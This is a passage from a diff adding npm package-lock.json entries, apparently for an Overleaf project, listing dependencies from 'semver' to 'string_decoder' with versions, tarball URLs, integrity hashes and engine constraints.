"https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/simple-update-notifier/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/sinon": { + "version": "9.2.4", + "resolved": "https://registry.npmjs.org/sinon/-/sinon-9.2.4.tgz", + "integrity": "sha512-zljcULZQsJxVra28qIAL6ow1Z9tpattkCTEJR4RBP3TGc00FcttsP5pK284Nas5WjMZU5Yzy3kAIp3B3KRf5Yg==", + "dev": true, + "dependencies": { + "@sinonjs/commons": "^1.8.1", + "@sinonjs/fake-timers": "^6.0.1", + "@sinonjs/samsam": "^5.3.1", + "diff": "^4.0.2", + "nise": "^4.0.4", + "supports-color": "^7.1.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/sinon" + } + }, + "node_modules/sinon-chai": { + "version": "3.7.0", + "resolved": "https://registry.npmjs.org/sinon-chai/-/sinon-chai-3.7.0.tgz", + "integrity": "sha512-mf5NURdUaSdnatJx3uhoBOrY9dtL19fiOtAdT1Azxg3+lNJFiuN0uzaU3xX1LeAfL17kHQhTAJgpsfhbMJMY2g==", + "dev": true, + "peerDependencies": { + "chai": "^4.0.0", + "sinon": ">=4.0.0" + } + }, + "node_modules/sinon-stub-promise": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/sinon-stub-promise/-/sinon-stub-promise-4.0.0.tgz", + "integrity": "sha1-bUmLoRmFV80B40Zq+S3H33JRksI=", + "dev": true, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/sinon/node_modules/diff": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/diff/-/diff-4.0.2.tgz", + "integrity": "sha512-58lmxKSA4BNyLz+HHMUzlOEpg09FV+ev6ZMe3vJihgdxzgcwZ8VoEEPmALCZG9LmqfVoNMMKpttIYTVG6uDY7A==", + "dev": true, + "engines": { + "node": ">=0.3.1" + } + }, + "node_modules/sinon/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dev": true, + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/sisteransi": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", + "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", + "dev": true, + "license": "MIT" + }, + "node_modules/slash": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-2.0.0.tgz", + "integrity": "sha512-ZYKh3Wh2z1PpEXWr0MpSBZ0V6mZHAQfYevttO11c51CaWjGTaadiKZ+wVt1PbMlDV5qhMFslpZCemhwOK7C89A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/slice-ansi": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", + "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/slice-ansi?sponsor=1" + } + }, + "node_modules/slice-ansi/node_modules/ansi-styles": { + "version": 
"4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/slugify": { + "version": "1.6.5", + "resolved": "https://registry.npmjs.org/slugify/-/slugify-1.6.5.tgz", + "integrity": "sha512-8mo9bslnBO3tr5PEVFzMPIWwWnipGS0xVbYf65zxDqfNwmzYn1LpiKNrR6DlClusuvo+hDHd1zKpmfAe83NQSQ==", + "dev": true, + "engines": { + "node": ">=8.0.0" + } + }, + "node_modules/smart-buffer": { + "version": "4.2.0", + "resolved": "https://registry.npmjs.org/smart-buffer/-/smart-buffer-4.2.0.tgz", + "integrity": "sha512-94hK0Hh8rPqQl2xXc3HsaBoOXKV20MToPkcXvwbISWLEs+64sBq5kFgn2kJDHb1Pry9yrP0dxrCI9RRci7RXKg==", + "optional": true, + "peer": true, + "engines": { + "node": ">= 6.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/snapdragon": { + "version": "0.8.2", + "resolved": "https://registry.npmjs.org/snapdragon/-/snapdragon-0.8.2.tgz", + "integrity": "sha512-FtyOnWN/wCHTVXOMwvSv26d+ko5vWlIDD6zoUJ7LW8vh+ZBC8QdljveRP+crNrtBwioEUWy/4dMtbBjA4ioNlg==", + "dev": true, + "dependencies": { + "base": "^0.11.1", + "debug": "^2.2.0", + "define-property": "^0.2.5", + "extend-shallow": "^2.0.1", + "map-cache": "^0.2.2", + "source-map": "^0.5.6", + "source-map-resolve": "^0.5.0", + "use": "^3.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-node": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/snapdragon-node/-/snapdragon-node-2.1.1.tgz", + "integrity": "sha512-O27l4xaMYt/RSQ5TR3vpWCAB5Kb/czIcqUFOM/C4fYcLnbZUc1PkjTAMjof2pBWaSTwOUd6qUHcFGVGj7aIwnw==", + "dev": true, + "dependencies": { + "define-property": "^1.0.0", + "isobject": "^3.0.0", + "snapdragon-util": "^3.0.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-node/node_modules/define-property": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-1.0.0.tgz", + "integrity": "sha512-cZTYKFWspt9jZsMscWo8sc/5lbPC9Q0N5nBLgb+Yd915iL3udB1uFgS3B8YCx66UVHq018DAVFoee7x+gxggeA==", + "dev": true, + "dependencies": { + "is-descriptor": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-util": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/snapdragon-util/-/snapdragon-util-3.0.1.tgz", + "integrity": "sha512-mbKkMdQKsjX4BAL4bRYTj21edOf8cN7XHdYUJEe+Zn99hVEYcMvKPct1IqNe7+AZPirn8BCDOQBHQZknqmKlZQ==", + "dev": true, + "dependencies": { + "kind-of": "^3.2.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon-util/node_modules/kind-of": { + "version": "3.2.2", + "resolved": "https://registry.npmjs.org/kind-of/-/kind-of-3.2.2.tgz", + "integrity": "sha512-NOW9QQXMoZGg/oqnVNoNTTIFEIid1627WCffUBJEdMxYApq7mNE7CpzucIPc+ZQg25Phej7IJSmX3hO+oblOtQ==", + "dev": true, + "dependencies": { + "is-buffer": "^1.1.5" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dev": true, + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/snapdragon/node_modules/define-property": { + "version": "0.2.5", + 
"resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/extend-shallow": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/extend-shallow/-/extend-shallow-2.0.1.tgz", + "integrity": "sha512-zCnTtlxNoAiDc3gqY2aYAWFx7XWWiasuF2K8Me5WbN8otHKTUKBwjPtNpRs/rbUZm7KxWAaNj7P1a/p52GbVug==", + "dev": true, + "dependencies": { + "is-extendable": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/snapdragon/node_modules/is-extendable": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/is-extendable/-/is-extendable-0.1.1.tgz", + "integrity": "sha512-5BMULNob1vgFX6EjQw5izWDxrecWK9AM72rugNr0TFldMOi0fj6Jk+zeKIt0xGj4cEfQIJth4w3OKWOJ4f+AFw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/snapdragon/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha512-Tpp60P6IUJDTuOq/5Z8cdskzJujfwqfOTkrwIwj7IRISpnkJnT6SyJ4PCPnGMoFjC9ddhal5KVIYtAt97ix05A==", + "dev": true + }, + "node_modules/snapdragon/node_modules/source-map": { + "version": "0.5.7", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", + "integrity": "sha512-LbrmJOMUSdEVxIKvdcJzQC+nQhe8FUZQTXQy6+I75skNgn3OoQ0DZA8YnFa7gp8tqtL3KPf1kmo0R5DoApeSGQ==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/socket.io": { + "version": "0.9.19-overleaf-11", + "resolved": "git+ssh://git@github.com/overleaf/socket.io.git#5afa587036620afa232d0f7b778ebb1541d7e4d5", + "dependencies": { + "base64id": "0.1.0", + "policyfile": "0.0.4" + }, + "engines": { + "node": ">= 0.4.0" + }, + "optionalDependencies": { + "redis": "0.7.3" + } + }, + "node_modules/socket.io-client": { + "version": "0.9.17-overleaf-5", + "resolved": "git+ssh://git@github.com/overleaf/socket.io-client.git#805a73d2a2e2408982597d5986a401088b7aa588", + "dependencies": { + "ws": "^1.1.5", + "xmlhttprequest": "^1.8.0" + }, + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/socket.io-client/node_modules/ws": { + "version": "1.1.5", + "resolved": "https://registry.npmjs.org/ws/-/ws-1.1.5.tgz", + "integrity": "sha512-o3KqipXNUdS7wpQzBHSe180lBGO60SoK0yVo3CYJgb2MkobuWuBX6dhkYP5ORCLd55y+SaflMOV5fqAB53ux4w==", + "dependencies": { + "options": ">=0.0.5", + "ultron": "1.0.x" + } + }, + "node_modules/sockjs": { + "version": "0.3.24", + "resolved": "https://registry.npmjs.org/sockjs/-/sockjs-0.3.24.tgz", + "integrity": "sha512-GJgLTZ7vYb/JtPSSZ10hsOYIvEYsjbNU+zPdIHcUaWVNUEPivzxku31865sSSud0Da0W4lEeOPlmw93zLQchuQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "faye-websocket": "^0.11.3", + "uuid": "^8.3.2", + "websocket-driver": "^0.7.4" + } + }, + "node_modules/sockjs/node_modules/uuid": { + "version": "8.3.2", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-8.3.2.tgz", + 
"integrity": "sha512-+NYs2QeMWy+GWFOEm9xnn6HCDp0l7QBD7ml8zLUmJ+93Q5NF0NocErnwkTkXVFNiX3/fpC6afS8Dhb/gz7R7eg==", + "dev": true, + "license": "MIT", + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/socks": { + "version": "2.8.3", + "resolved": "https://registry.npmjs.org/socks/-/socks-2.8.3.tgz", + "integrity": "sha512-l5x7VUUWbjVFbafGLxPWkYsHIhEvmF85tbIeFZWc8ZPtoMyybuEhL7Jye/ooC4/d48FgOjSJXgsF/AJPYCW8Zw==", + "optional": true, + "peer": true, + "dependencies": { + "ip-address": "^9.0.5", + "smart-buffer": "^4.2.0" + }, + "engines": { + "node": ">= 10.0.0", + "npm": ">= 3.0.0" + } + }, + "node_modules/sortobject": { + "version": "4.16.0", + "resolved": "https://registry.npmjs.org/sortobject/-/sortobject-4.16.0.tgz", + "integrity": "sha512-jdcWhqJjxyYxRcXa30qImF3PZea1GpNwdKxUac28T28+GodptH4XihPuRlgCY0hITIEQVnw8DtQ81Fb6fomBaw==", + "dev": true, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://bevry.me/fund" + } + }, + "node_modules/source-list-map": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/source-list-map/-/source-list-map-2.0.1.tgz", + "integrity": "sha512-qnQ7gVMxGNxsiL4lEuJwe/To8UnK7fAnmbGEEH8RpLouuKbeEm0lhbQVFIrNSuB+G7tVrAlVsZgETT5nljf+Iw==", + "dev": true + }, + "node_modules/source-map": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", + "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/source-map-js": { + "version": "1.2.0", + "resolved": "https://registry.npmjs.org/source-map-js/-/source-map-js-1.2.0.tgz", + "integrity": "sha512-itJW8lvSA0TXEphiRoawsCksnlf8SyvmFzIhltqAHluXd88pkCd+cXJVHTDwdCr0IzwptSm035IHQktUu1QUMg==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/source-map-resolve": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/source-map-resolve/-/source-map-resolve-0.5.3.tgz", + "integrity": "sha512-Htz+RnsXWk5+P2slx5Jh3Q66vhQj1Cllm0zvnaY98+NFx+Dv2CF/f5O/t8x+KaNdrdIAsruNzoh/KpialbqAnw==", + "deprecated": "See https://github.com/lydell/source-map-resolve#deprecated", + "dev": true, + "dependencies": { + "atob": "^2.1.2", + "decode-uri-component": "^0.2.0", + "resolve-url": "^0.2.1", + "source-map-url": "^0.4.0", + "urix": "^0.1.0" + } + }, + "node_modules/source-map-support": { + "version": "0.5.21", + "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.21.tgz", + "integrity": "sha512-uBHU3L3czsIyYXKX88fdrGovxdSCoTGDRZ6SYXtSRxLZUzHg5P/66Ht6uoUlHu9EZod+inXhKo3qQgwXUT/y1w==", + "dependencies": { + "buffer-from": "^1.0.0", + "source-map": "^0.6.0" + } + }, + "node_modules/source-map-url": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/source-map-url/-/source-map-url-0.4.1.tgz", + "integrity": "sha512-cPiFOTLUKvJFIg4SKVScy4ilPPW6rFgMgfuZJPNoDuMs3nC1HbMUycBoJw77xFIp6z1UJQJOfx6C9GMH80DiTw==", + "deprecated": "See https://github.com/lydell/source-map-url#deprecated", + "dev": true + }, + "node_modules/spark-md5": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/spark-md5/-/spark-md5-3.0.2.tgz", + "integrity": "sha512-wcFzz9cDfbuqe0FZzfi2or1sgyIrsDwmPwfZC4hiNidPdPINjeUwNfv5kldczoEAcjl9Y1L3SM7Uz2PUEQzxQw==" + }, + "node_modules/sparse-bitfield": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/sparse-bitfield/-/sparse-bitfield-3.0.3.tgz", + "integrity": "sha1-/0rm5oZWBWuks+eSqzM004JzyhE=", + "dependencies": { + "memory-pager": "^1.0.2" + } + }, 
+ "node_modules/spdx-correct": { + "version": "3.2.0", + "resolved": "https://registry.npmjs.org/spdx-correct/-/spdx-correct-3.2.0.tgz", + "integrity": "sha512-kN9dJbvnySHULIluDHy32WHRUu3Og7B9sbY7tsFLctQkIqnMh3hErYgdMjTYuqmcXX+lK5T1lnUt3G7zNswmZA==", + "dev": true, + "dependencies": { + "spdx-expression-parse": "^3.0.0", + "spdx-license-ids": "^3.0.0" + } + }, + "node_modules/spdx-exceptions": { + "version": "2.5.0", + "resolved": "https://registry.npmjs.org/spdx-exceptions/-/spdx-exceptions-2.5.0.tgz", + "integrity": "sha512-PiU42r+xO4UbUS1buo3LPJkjlO7430Xn5SVAhdpzzsPHsjbYVflnnFdATgabnLude+Cqu25p6N+g2lw/PFsa4w==", + "dev": true + }, + "node_modules/spdx-expression-parse": { + "version": "3.0.1", + "resolved": "https://registry.npmjs.org/spdx-expression-parse/-/spdx-expression-parse-3.0.1.tgz", + "integrity": "sha512-cbqHunsQWnJNE6KhVSMsMeH5H/L9EpymbzqTQ3uLwNCLZ1Q481oWaofqH7nO6V07xlXwY6PhQdQ2IedWx/ZK4Q==", + "dev": true, + "dependencies": { + "spdx-exceptions": "^2.1.0", + "spdx-license-ids": "^3.0.0" + } + }, + "node_modules/spdx-license-ids": { + "version": "3.0.20", + "resolved": "https://registry.npmjs.org/spdx-license-ids/-/spdx-license-ids-3.0.20.tgz", + "integrity": "sha512-jg25NiDV/1fLtSgEgyvVyDunvaNHbuwF9lfNV17gSmPFAlYzdfNBlLtLzXTevwkPj7DhGbmN9VnmJIgLnhvaBw==", + "dev": true + }, + "node_modules/spdy": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/spdy/-/spdy-4.0.2.tgz", + "integrity": "sha512-r46gZQZQV+Kl9oItvl1JZZqJKGr+oEkB08A6BzkiR7593/7IbtuncXHd2YoYeTsG4157ZssMu9KYvUHLcjcDoA==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.0", + "handle-thing": "^2.0.0", + "http-deceiver": "^1.2.7", + "select-hose": "^2.0.0", + "spdy-transport": "^3.0.0" + }, + "engines": { + "node": ">=6.0.0" + } + }, + "node_modules/spdy-transport": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/spdy-transport/-/spdy-transport-3.0.0.tgz", + "integrity": "sha512-hsLVFE5SjA6TCisWeJXFKniGGOpBgMLmerfO2aCyCU5s7nJ/rpAepqmFifv/GCbSbueEeAJJnmSQ2rKC/g8Fcw==", + "dev": true, + "license": "MIT", + "dependencies": { + "debug": "^4.1.0", + "detect-node": "^2.0.4", + "hpack.js": "^2.1.6", + "obuf": "^1.1.2", + "readable-stream": "^3.0.6", + "wbuf": "^1.7.3" + } + }, + "node_modules/split": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split/-/split-1.0.1.tgz", + "integrity": "sha512-mTyOoPbrivtXnwnIxZRFYRrPNtEFKlpB2fvjSnCQUiAA6qAZzqwna5envK4uk6OIeP17CsdF3rSBGYVBsU0Tkg==", + "dependencies": { + "through": "2" + }, + "engines": { + "node": "*" + } + }, + "node_modules/split-ca": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/split-ca/-/split-ca-1.0.1.tgz", + "integrity": "sha1-bIOv82kvphJW4M0ZfgXp3hV2kaY=" + }, + "node_modules/split-string": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/split-string/-/split-string-3.1.0.tgz", + "integrity": "sha512-NzNVhJDYpwceVVii8/Hu6DKfD2G+NrQHlS/V/qgv763EYudVwEcMQNxd2lh+0VrUByXN/oJkl5grOhYWvQUYiw==", + "dev": true, + "dependencies": { + "extend-shallow": "^3.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/split2": { + "version": "4.1.0", + "resolved": "https://registry.npmjs.org/split2/-/split2-4.1.0.tgz", + "integrity": "sha512-VBiJxFkxiXRlUIeyMQi8s4hgvKCSjtknJv/LVYbrgALPwf5zSKmEwV9Lst25AkvMDnvxODugjdl6KZgwKM1WYQ==", + "engines": { + "node": ">= 10.x" + } + }, + "node_modules/sprintf-js": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", + "integrity": "sha1-BOaSb2YolTVPPdAVIDYzuFcpfiw=" + 
}, + "node_modules/sprintf-kit": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/sprintf-kit/-/sprintf-kit-2.0.1.tgz", + "integrity": "sha512-2PNlcs3j5JflQKcg4wpdqpZ+AjhQJ2OZEo34NXDtlB0tIPG84xaaXhpA8XFacFiwjKA4m49UOYG83y3hbMn/gQ==", + "dependencies": { + "es5-ext": "^0.10.53" + } + }, + "node_modules/sshpk": { + "version": "1.17.0", + "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", + "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", + "dependencies": { + "asn1": "~0.2.3", + "assert-plus": "^1.0.0", + "bcrypt-pbkdf": "^1.0.0", + "dashdash": "^1.12.0", + "ecc-jsbn": "~0.1.1", + "getpass": "^0.1.1", + "jsbn": "~0.1.0", + "safer-buffer": "^2.0.2", + "tweetnacl": "~0.14.0" + }, + "bin": { + "sshpk-conv": "bin/sshpk-conv", + "sshpk-sign": "bin/sshpk-sign", + "sshpk-verify": "bin/sshpk-verify" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/sshpk/node_modules/assert-plus": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", + "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/stack-trace": { + "version": "0.0.9", + "resolved": "https://registry.npmjs.org/stack-trace/-/stack-trace-0.0.9.tgz", + "integrity": "sha1-qPbq7KkGdMMz58Q5U/J1tFFRBpU=", + "dev": true, + "engines": { + "node": "*" + } + }, + "node_modules/stackframe": { + "version": "1.3.4", + "resolved": "https://registry.npmjs.org/stackframe/-/stackframe-1.3.4.tgz", + "integrity": "sha512-oeVtt7eWQS+Na6F//S4kJ2K2VbRlS9D43mAlMyVpVWovy9o+jfgH8O9agzANzaiLjclA0oYzUXEM4PurhSUChw==", + "dev": true, + "license": "MIT" + }, + "node_modules/standard-as-callback": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/standard-as-callback/-/standard-as-callback-2.1.0.tgz", + "integrity": "sha512-qoRRSyROncaz1z0mvYqIE4lCd9p2R90i6GxW3uZv5ucSu8tU7B5HXUP1gG8pVZsYNVaXjk8ClXHPttLyxAL48A==" + }, + "node_modules/static-extend": { + "version": "0.1.2", + "resolved": "https://registry.npmjs.org/static-extend/-/static-extend-0.1.2.tgz", + "integrity": "sha512-72E9+uLc27Mt718pMHt9VMNiAL4LMsmDbBva8mxWUCkT07fSzEGMYUCk0XWY6lp0j6RBAG4cJ3mWuZv2OE3s0g==", + "dev": true, + "dependencies": { + "define-property": "^0.2.5", + "object-copy": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/static-extend/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/static-extend/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/statuses": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-1.5.0.tgz", + "integrity": "sha1-Fhx9rBd2Wf2YEfQ3cfqZOBR4Yow=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/stop-iteration-iterator": { + "version": "1.0.0", + "resolved": 
"https://registry.npmjs.org/stop-iteration-iterator/-/stop-iteration-iterator-1.0.0.tgz", + "integrity": "sha512-iCGQj+0l0HOdZ2AEeBADlsRC+vsnDsZsbdSiH1yNSjcfKM7fdpCMfqAL/dwF5BLiw/XhRft/Wax6zQbhq2BcjQ==", + "dev": true, + "dependencies": { + "internal-slot": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/storybook": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/storybook/-/storybook-8.6.4.tgz", + "integrity": "sha512-XXh1Acvf1r3BQX0BDLQw6yhZ7yUGvYxIcKOBuMdetnX7iXtczipJTfw0uyFwk0ltkKEE9PpJvivYmARF3u64VQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@storybook/core": "8.6.4" + }, + "bin": { + "getstorybook": "bin/index.cjs", + "sb": "bin/index.cjs", + "storybook": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + }, + "peerDependencies": { + "prettier": "^2 || ^3" + }, + "peerDependenciesMeta": { + "prettier": { + "optional": true + } + } + }, + "node_modules/stream-composer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/stream-composer/-/stream-composer-1.0.2.tgz", + "integrity": "sha512-bnBselmwfX5K10AH6L4c8+S5lgZMWI7ZYrz2rvYjCPB2DIMC4Ig8OpxGpNJSxRZ58oti7y1IcNvjBAz9vW5m4w==", + "dev": true, + "dependencies": { + "streamx": "^2.13.2" + } + }, + "node_modules/stream-events": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/stream-events/-/stream-events-1.0.5.tgz", + "integrity": "sha512-E1GUzBSgvct8Jsb3v2X15pjzN1tYebtbLaMg+eBOUOAxgbLoSbT2NS91ckc5lJD1KfLjId+jXJRgo0qnV5Nerg==", + "dependencies": { + "stubs": "^3.0.0" + } + }, + "node_modules/stream-shift": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/stream-shift/-/stream-shift-1.0.3.tgz", + "integrity": "sha512-76ORR0DO1o1hlKwTbi/DM3EXWGf3ZJYO8cXX5RJwnul2DEg2oyoZyjLNoQM8WsvZiFKCRfC1O0J7iCvie3RZmQ==" + }, + "node_modules/stream-transform": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/stream-transform/-/stream-transform-2.1.3.tgz", + "integrity": "sha512-9GHUiM5hMiCi6Y03jD2ARC1ettBXkQBoQAe7nJsPknnI0ow10aXjTnew8QtYQmLjzn974BnmWEAJgCY6ZP1DeQ==", + "dependencies": { + "mixme": "^0.5.1" + } + }, + "node_modules/streamifier": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/streamifier/-/streamifier-0.1.1.tgz", + "integrity": "sha1-l+mNj6TRBdYqJpHR3AfoINuN/E8=", + "dev": true, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/streamsearch": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/streamsearch/-/streamsearch-1.1.0.tgz", + "integrity": "sha512-Mcc5wHehp9aXz1ax6bZUyY5afg9u2rv5cqQI3mRrYkGC8rW2hM02jWuwjtL++LS5qinSyhj2QfLyNsuc+VsExg==", + "engines": { + "node": ">=10.0.0" + } + }, + "node_modules/streamx": { + "version": "2.22.0", + "resolved": "https://registry.npmjs.org/streamx/-/streamx-2.22.0.tgz", + "integrity": "sha512-sLh1evHOzBy/iWRiR6d1zRcLao4gGZr3C1kzNz4fopCOKJb6xD9ub8Mpi9Mr1R6id5o43S+d93fI48UC5uM9aw==", + "license": "MIT", + "dependencies": { + "fast-fifo": "^1.3.2", + "text-decoder": "^1.1.0" + }, + "optionalDependencies": { + "bare-events": "^2.2.0" + } + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/string_decoder/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": 
